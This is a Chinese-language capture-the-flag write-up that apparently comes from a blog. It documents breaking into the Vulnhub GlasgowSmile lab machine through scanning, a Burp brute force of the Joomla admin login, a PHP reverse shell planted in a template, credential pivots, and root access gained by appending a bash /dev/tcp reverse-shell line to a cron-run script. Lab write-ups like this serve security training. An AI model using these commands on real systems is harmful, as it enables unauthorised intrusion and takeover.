Vulnhub GlasgowSmile靶机渗透记录

环境配置

镜像下载地址:http://www.vulnhub.com/entry/glasgow-smile-11,491/
目标:三个user.txt,root权限
Kali Linux IP: 192.168.1.128
GlasgowSmile IP: 192.168.1.142

信息收集

  • 利用netdiscover进行主机发现:
netdiscover -i 网卡设备名

netdiscover cmd
netdiscover result

  • 使用nmap进行端口扫描:
nmap -A -p- -sS 192.168.1.142

nmap result

  • 使用dirb对80端口的http服务进行目录遍历:
dirb http://192.168.1.142 /usr/share/wordlists/dirb/big.txt

dirb result
简单遍历一下就发现很多站点的目录文件信息,ta的CMS是joomla,接下来访问一下站点:

  • 访问http://192.168.1.142
    index_1
    站点主页面也没有特别的信息,源码也没有信息点。
  • 访问:http://192.168.1.142/joomlaindex_2
    第二个页面里面有小丑电影的台词,根据主页内容可以推测站主可能对小丑比较喜爱,可以尝试利用cewl用主页内容生成密码字典:
cewl http://192.168.1.142/joomla -m 5 -d 1 -w joker.txt

在这里插入图片描述
访问:http://192.168.1.142/joomla/administrator/index.php
joomla index

漏洞利用

后台登录界面,可以尝试利用Burpsuite爆破,用户名用joomla,密码字典利用刚刚生成的joker.txt:

  • 确定浏览器代理:
    proxy
  • 启用burpsuite爆破:
    burpsuite
    payload
    result
    拿到账号密码,账号:joomla ,密码:Gotham 登录后台:
    后台

GetShell

打开模块进行反弹shell编辑:
Templates
tmp
index getshell
编辑index.php,可以利用pentestmonkey里面的php webshell代码:
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
php_shell
编辑完之后进行save,然后打开nc监听,最后点击预览页面:

nc -lvp 4444

nc
get
getshell

权限提升

  • 利用python3打开一个bash终端:
python3 -c "import pty;pty.spawn('/bin/bash')"

tty

  • 去/home目录下查看用户的主目录,确认用户:
ls /home

ls home
可以看到三个用户主目录abner,penguin,rob

1. 权限提升rob:
目前用户是www-data,站点的用户,我们去/var/www/查看目录信息:
www
存在一个joomla2文件夹,查看一下:
joomla2
存在配置文件,cat一下内容:
conf
发现数据库账号密码,账号:joomla,密码:babyjoker,登录数据库查看:

mysql -u joomla -p

mysql
经过一番查找,在数据库batjoke下的taskforce表中下发现:
rob
将pswd进行base64解密:

echo 'Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/' | base64 -d

rob passwd
账号:rob 密码:???AllIHaveAreNegativeThoughts???

2. 权限提升abner
利用rob的账号进行ssh登录:
ssh
查看rob主目录内容:

cat user.txt

user1

cat howtoberoot

how

cat Abnerineedyourhelp

abner_help
观察内容发现纯英文,有空格,类似一封信,但是内容却无意义,考虑利用率rot13类似的加密算法,去https://gchq.github.io/CyberChef/对内容进行解密:
rot13
当偏移量为1时候内容有意思,对文章末尾的密码进行base64解码。

echo 'STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==' | base64 -d

abner
账号:abner,密码:I33hope99my0death000makes44more8cents00than0my0life0
利用su切换到abner用户:

3. 权限提升penguin
进入abner主目录查看信息:

cat user2.txt

user2

cat info.txt

info
是对Glasgow smile的介绍,全盘搜索与penguin用户相关的文件:

find / -iname *penguin* 2>/dev/null

find penguin
发现隐藏文件,查看文件详情:

ls -al /var/www/joomla2/administrator/manifests/files/

ls_penguin
属于abner的隐藏压缩文件,负责到用户主目录进行解压:

cp /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip ~ && unzip .dear_penguins.zip

利用abner的登录凭证解压:I33hope99my0death000makes44more8cents00than0my0life0
unzip
查看解压内容:
cat penguin
账号:penguin,密码:scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz
利用su切换到penguin用户。

4. 权限提升root
进入penguin主目录查看内容:

penguin ls

cat user3.txt

user3.txt

cat PeopleAreStartingToNotice.txt

notice
结合文件内容,发现.trash_old属于用户penguin,root组并且任何人都可执行。
利用pspy对系统进程进行监控,以及对用户命令的执行进行枚举:
github:https://github.com/DominicBreuker/pspy

  • Kali在pspy目录下启动python http服务:
python -m SimpleHTTPServer 8080 &

pyhtp

  • 靶机通过wget下载pspy64:
wget http://192.168.1.128:8080/pspy64 -O pspy64

pspy64 get

  • 赋予执行权限并运行:
chmod +x pspy64 && ./pspy64 -p -i 1000

pspy64选项:
-p:启用输出命令到标准输出(默认启用)
-f:启用将文件系统事件打印到STDOUT(默认禁用)
-i:两次扫描procfs的时间间隔(单位:毫秒)
pspy
发现.trash_old 每一分钟一root权限运行一次,可以将反弹shell代码写入,让其自动执行:

echo "bash -c 'bash -i >& /dev/tcp/192.168.1.128/4444 0>&1'" >> .trash_old

并用vi编辑,将exit 0 用#注释:
get root
Kali启用nc监听等待自动连接:

nc -lvp 4444

root
拿到root权限完成渗透。

  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值